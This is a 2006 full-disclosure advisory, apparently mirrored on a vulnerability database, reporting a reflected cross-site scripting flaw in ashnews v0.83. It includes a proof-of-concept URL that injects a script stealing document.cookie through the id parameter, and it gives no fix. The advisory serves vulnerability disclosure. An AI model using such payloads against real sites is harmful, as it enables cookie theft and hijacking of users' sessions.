Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11232
HistoryJan 30, 2006 - 12:00 a.m.

[Full-disclosure] ashnews Cross-Site Scripting Vulnerability

2006-01-3000:00:00
vulners.com
24
JSON

###########################################################################

Advisory #5 Title: ashnews Cross-Site Scripting Vulnerability

Author: 0o_zeus_o0 and fraude

Contact: [email protected]

Website: Elitemexico.org

Date: 30/01/2006

Risk: High

Vendor Url: http://dev.ashwebstudio.com/

Affected Software: ashnews

Non Affected:

We Are: olimpus klan team

#TECHNICAL INFO
#================================================================

#vulnerability that allows to the robbery of cookie and kidnapping of user

#Example:

#http://www.url.com/[path]/ashnews.php?page=showcomments&id=<script><script>alert(document.cookie)</script>

#http://www.url.com/[path]/ashnews.php?page=showcomments&id=[xss]

#Solution:

#VULNERABLE VERSIONS
#================================================================
#ashnews v0.83 Other versions may also be affected.

#================================================================
#Contact information
#0o_zeus_o0
#[email protected]
#www.olimpusklan.org
#================================================================
#greetz: lady fire,Mi beba, fraude and security-mx
##############################################################################

JSON